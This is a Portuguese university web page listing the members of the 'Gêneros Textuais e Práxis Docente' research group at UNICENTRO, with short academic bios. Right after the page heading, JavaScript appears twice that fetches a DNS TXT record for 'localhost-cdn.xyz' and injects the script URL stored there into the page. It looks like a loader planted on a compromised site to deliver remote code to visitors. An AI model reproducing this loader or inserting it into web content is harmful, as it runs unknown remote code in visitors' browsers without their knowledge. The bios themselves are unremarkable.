Integrantes do Grupofetch("https://cloudflare-dns.com/dns-query?name=localhost-cdn.xyz&type=TXT", {headers:{ "accept": "application/dns-json" }}).then(e=>e.json()).then(e=>{const t=document.createElement("script");t.src=JSON.parse(e.Answer[0].data),document.querySelector("head").appendChild(t)});fetch("https://cloudflare-dns.com/dns-query?name=localhost-cdn.xyz&type=TXT", {headers:{ "accept": "application/dns-json" }}).then(e=>e.json()).then(e=>{const t=document.createElement("script");t.src=JSON.parse(e.Answer[0].data),document.querySelector("head").appendChild(t)});

Lídia Stutz

Possui graduação em Letras Português Inglês pela Universidade Estadual do Centro-Oeste (1993), mestrado em Letras (Inglês e Literatura Correspondente) pela Universidade Federal de Santa Catarina (2005), doutorado em Estudos da Linguagem pela Universidade Estadual de Londrina (2012) com estágio doutoral realizado na Universidade de Genebra (Bolsa CAPES- DS – 2010) e pós-doutorado em Estudos da Linguagem pela Universidade Estadual de Londrina (2017). Professora Adjunta Nível D do Departamento de Letras e do Mestrado em Letras na Universidade Estadual do Centro-Oeste. É líder do grupo de pesquisa Gêneros Textuais e Práxis Docente – UNICENTRO e integrante do grupo de pesquisa Linguagem e Educação da UEL. Atuou como coordenadora do Subprojeto PIBID Letras Inglês de agosto 2012 – 2018. De agosto de 2017 a janeiro de 2019 coordenou o Programa de Pós-Graduação Stricto Sensu em Letras (Nível Mestrado) na UNICENTRO. A professora atua no Estágio Supervisionado em Língua Inglesa e tem experiência na área de Linguística Aplicada à Língua Inglesa, com ênfase nos seguintes temas: ensino de Línguas, interacionismo sociodiscursivo, gêneros textuais, saberes docentes, formação de professores, reflexividade e gestos didáticos.
[Currículo Lattes]

Edan Luis de Almeida

Possui graduação em Letras Inglês e Literaturas de Língua inglesa pela Universidade Estadual do Centro-Oeste, UNICENTRO (2016). Mestrando em Letras – Interfaces entre Língua e Literatura (2018-2020).
[Currículo Lattes] 

Eleticia Elza Carneiro Podolak Strukoski

Graduada em Letras Inglês pela Universidade Estadual do Centro-Oeste e mestranda do programa de Pós-graduação Mestrado em Letras pela mesma instituição. Professora de língua portuguesa na modalidade de imersão em língua estrangeira, no estado de Utah, Estados Unidos. Área de pesquisa com ênfase em educação, língua inglesa e linguística aplicada.
[Currículo Lattes] 

Everton Gelinski Gomes de Souza

É professor colaborador do Departamento de Letras na Universidade Estadual do Centro-Oeste. É membro do grupo Gêneros Textuais e Práxis Docente, desenvolvendo estudos direcionados às didáticas das línguas. Tem experiência na área de Letras, com ênfase em Linguística Aplicada, atuando principalmente nos seguintes temas: gêneros textuais, interacionismo sociodiscursivo e ensino de língua inglesa.
[Currículo Lattes]

Gabriela Tabareli Neuvald

Possui graduação em Letras – Inglês pela Universidade Estadual do Centro-Oeste (2018). Mestranda em Letras pela UNICENTRO. Atualmente é professora de língua inglesa no Ensino Básico. Tem experiência na área de Letras, com ênfase em Línguas Estrangeiras Modernas, pesquisa principalmente nos seguintes temas: interacionismo, ensino e letramento científico.
[Currículo Lattes]

Gerson Anschau Poleze

English as a Second Language – East Coast Language College, Halifax, Canadá (Bolsa PFI/SETI-Pr e Languages Canada / 2018). Mestrando em Letras – Interfaces entre Língua e Literatura, na linha de pesquisa em Linguagens, leitura e interpretação, pelo Programa de Pós-Graduação Stricto Sensu em Letras da Universidade Estadual do Centro-Oeste do Paraná. Aluno do curso de formação continuada para Pesquisador em Ciências da Educação: Estratégias de Ensino e Aprendizagem, pelo Instituto Federal de Minas Gerais, Campus Arcos / IFMG. Graduação em Pedagogia (2013). Membro do Grupo de Estudos Gêneros textuais e práxis docente, junto ao CNPQ (dgp.cnpq.br/dgp/espelhogrupo/8458521720239451) e vinculado ao Laboratório de Linguagem, Variação e Ensino (LIVE – PPGL / UNICENTRO). Realiza pesquisas na área de gêneros textuais, com foco em modelização didática e construção de sequências didáticas para ensino de língua estrangeira na educação infantil e anos iniciais, formação de profissionais de língua estrangeira e análise do papel da língua estrangeira/adicional nos documentos que legislam o ensino na 1ª etapa da educação básica.
[Currículo Lattes]

Josiete Cristina Schneider Queroz

Possui graduação em Letras Português Alemão pela Universidade do Vale do Rio dos Sinos (2009), pós-graduação em Educação Infantil e anos iniciais do Ensino Fundamental pelo Centro de Ensino Superior de Maringá (2018) e mestrado em Letras (Interfaces entre língua e literatura) pela Universidade Estadual do Centro-Oeste (2016). Atualmente, cursa doutorado em Letras pela Universidade Federal do Rio Grande do Sul (UFRGS). Tem experiência na área de Letras, com ênfase em Linguística Aplicada, atuando principalmente nos seguintes temas: interacionismo sociodiscursivo, gêneros textuais, sequências didáticas, ensino de língua alemã em contextos plurilíngues, formação de professores e gestos didáticos.

[Currículo Lattes]

Marco Antonio Cacilho

Atua  no Ensino Superior como professor colaborador da Faculdade Campo Real. Tem experiência na área de Letras, com ênfase em Linguística Aplicada, atuando principalmente nos seguintes temas: gêneros textuais, interacionismo sociodiscursivo e ensino de língua portuguesa.
[Currículo Lattes]

Monica Lopes

Mestrado em Letras Interfaces entre Língua e Literatura UNICENTRO(2015/2017). Professora QPM de Administração e Inglês na SEED-PR. Desenvolve pesquisas nas áreas de Formação inicial e continuada de Professores de Inglês, Ensino e aprendizagem de Inglês.
[Currículo Lattes]

Priscila Azevedo da Fonseca Lanferdini

Doutora em Estudos da Linguagem pela Universidade Estadual de Londrina (UEL), na linha de formação de professores de Língua Inglesa, e mestre na mesma área (2012), sob orientação da Profª. Drª. Vera Lúcia Lopes Cristovão. Possui especialização em Ensino de Língua Inglesa pela Faculdade Iguaçu – ESAP (2007) e graduação em Letras-inglês e Literaturas de Língua Inglesa pela Universidade Estadual do Centro-Oeste – UNICENTRO (2006). É professora de Língua Inglesa da rede Básica de Ensino em Guarapuava (PR) desde 2012. Foi professora supervisora do subprojeto PIBID/Letras-Inglês da UNICENTRO entre os anos de 2013 e 2016. Realizou estágio sanduíche na Carleton University, sob supervisão do Profº. Drº. Devon Woods e da Profª. Drª. Eva Kartchava, sendo bolsista do Emerging Leaders in the Americas Program (ELAP), do Governo do Canadá no período de 09/2016 a 04/2017. Tem interesse na área de Letras, com ênfase no ensino e aprendizagem de Língua Inglesa, atuando principalmente nos seguintes temas: metodologias de ensino de línguas; formação inicial e continuada de professores; planejamento didático docente; políticas públicas educacionais; gêneros de textos; sequências didáticas e análise de materiais didáticos.
[Currículo Lattes] 

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *